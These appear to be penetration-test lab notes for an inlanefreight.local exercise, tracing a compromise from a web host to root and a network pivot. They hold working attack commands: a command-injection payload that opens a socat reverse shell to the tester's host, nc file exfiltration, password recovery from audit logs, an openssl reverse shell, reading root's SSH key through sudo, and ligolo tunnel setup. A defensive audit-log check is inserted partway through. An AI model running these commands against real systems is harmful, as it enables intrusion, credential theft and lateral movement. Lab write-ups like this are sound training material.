# Shell as `webdev`
- payload
```bash
# single quotes keep the local shell from expanding ${IFS} before curl sends the request
curl 'http://monitoring.inlanefreight.local/ping.php?ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash'
```
- we have a hit ![[images/Pasted image 20260630222557.png]]
- stabilize shell
- we can read logs in `/var/log` because we are in the `adm` group
- move `audit.log` to Kali
```bash
which nc                                   # on target: check that nc is available
nc -lnvp 9002 -q 3 > loot/audit.log        # on Kali: listener that writes the incoming file to loot/audit.log
nc -q 3 -nv 10.10.15.114 9002 < audit.log  # on target: push audit.log to Kali
```
- now we need a tool to parse `audit.log` ![[images/Pasted image 20260701172600.png]]
- try `audit-pretty` first, then `aushape`
- got both working and grepped for `srvadm` and `webdev`
- I see `/usr/bin/su` being called but no creds
- try `aureport`
- install `auditd` (provides `aureport`)
- we could have also done this on target
- this leaks creds for `srvadm`
```bash
# on Kali, against the copied log: -if reads the given file instead of /var/log/audit
aureport -if audit.log --tty | grep -B5 srvadm
```
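A defender-side check for the cause of this leak, added here as an example that is not part of the original notes: it parses audit.log records and flags every `type=TTY` record as captured keystrokes, rating input taken by `su`/`sudo` as high because with `log_passwd` enabled that data is the typed password. The sample records, field values and hex data are constructed, not taken from the target.

```python
import re

# Constructed sample of auditd records in audit.log format (not from the
# target). The two type=TTY lines are what pam_tty_audit writes: every
# keystroke, hex-encoded in data=, including input typed at a password prompt.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1719860000.101:3001): arch=c000003e syscall=59 success=yes exit=0 comm="su" exe="/usr/bin/su" uid=1001 auid=1001 ses=7
type=EXECVE msg=audit(1719860000.101:3001): argc=2 a0="su" a1="srvadm"
type=TTY msg=audit(1719860003.412:3002): tty pid=4242 uid=1001 auid=1001 ses=7 major=136 minor=1 comm="su" data=73757065727365637265740A
type=TTY msg=audit(1719860010.900:3003): tty pid=4250 uid=0 auid=1001 ses=7 major=136 minor=1 comm="bash" data=69640A
type=USER_END msg=audit(1719860020.000:3004): pid=4242 uid=1001 auid=1001 ses=7 msg='op=PAM:session_close acct="srvadm" exe="/usr/bin/su" res=success'
"""

RECORD_RE = re.compile(r'^type=(\S+) msg=audit\([\d.]+:(\d+)\): (.*)$')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Programs whose TTY input is normally a credential prompt.
CRED_PROMPT_COMMS = {"su", "sudo", "passwd", "ssh"}


def parse_records(text):
    """Split audit.log lines into dicts: type, serial and the body's key=value fields."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # continuation or unparseable line
        rec = {"type": m.group(1), "serial": int(m.group(2))}
        for key, value in KV_RE.findall(m.group(3)):
            rec[key] = value.strip('"')
        records.append(rec)
    return records


def tty_keystroke_findings(records):
    """Flag each TTY record as captured keystrokes; input read by su/sudo is
    rated high because, with log_passwd set, it is the password that was typed."""
    findings = []
    for rec in records:
        if rec["type"] != "TTY":
            continue
        comm = rec.get("comm", "")
        findings.append({
            "serial": rec["serial"],
            "auid": rec.get("auid"),
            "comm": comm,
            "bytes": len(rec.get("data", "")) // 2,  # data= is hex, 2 chars per byte
            "severity": "high" if comm in CRED_PROMPT_COMMS else "medium",
        })
    return findings
```

Remediation is to drop `log_passwd` from (or remove) the `pam_tty_audit` line in the PAM stack and to keep `/var/log/audit` unreadable by the `adm` group.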
# Shell as `srvadm`
- `su` to `srvadm`
- `flag.txt` in home dir
- not much else
- DMZ01 is dual-homed ![[images/Pasted image 20260701200741.png]]
- we can run `openssl` as root ![[images/Pasted image 20260701175658.png]]
- try the `openssl` reverse shell below from GTFOBins
```bash
mkfifo /tmp/f
sudo /bin/sh -i </tmp/f 2>&1 | sudo openssl s_client -quiet -connect 10.10.15.114:9002 >/tmp/f
```
- that did not work; instead, read `id_rsa`
```bash
sudo openssl enc -in /root/.ssh/id_rsa > id_rsa
```
![[images/Pasted image 20260701192428.png]]
- move it back to Kali with the `nc` trick above ![[images/Pasted image 20260701195304.png]]
# Shell as `root`
## light enum
- networking check ![[images/Pasted image 20260701195343.png]]
- interface 4 (172.18.0.0/16) is a custom Docker bridge network and interface 5 (172.17.0.0/16) is the default Docker network
- `.bash_history` ![[images/Pasted image 20260701195717.png]]
- docker containers: `docker ps -a` ![[images/Pasted image 20260701195747.png]]
- login shells
## host discovery
- 172.16.8.0/16 subnet
```bash
# ping sweep of 172.16.8.0/24 from DMZ01, one background ping per host
for i in {1..254}; do (ping -c 1 172.16.8.$i | grep "bytes from" &); done
```
![[images/Pasted image 20260701201424.png]]
## setup pivot
- steps on Kali
```bash
sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up
sudo ip route add 172.16.8.0/24 dev ligolo; ip route | grep ligolo
sudo ./proxy -laddr 0.0.0.0:11601 -selfcert
scp -i ../loot/dmz01.id_rsa agent [email protected]:/root  # move the ligolo agent to DMZ01
```
- steps on DMZ01
```bash
./agent -connect 10.10.15.114:11601 -ignore-cert
```
- steps in ligolo
```bash
ligolo > session #select session 1
ligolo > start --tun ligolo
```
- confirm interface and routes ![[images/Pasted image 20260701202408.png]]
- confirm with ping ![[images/Pasted image 20260701202428.png]]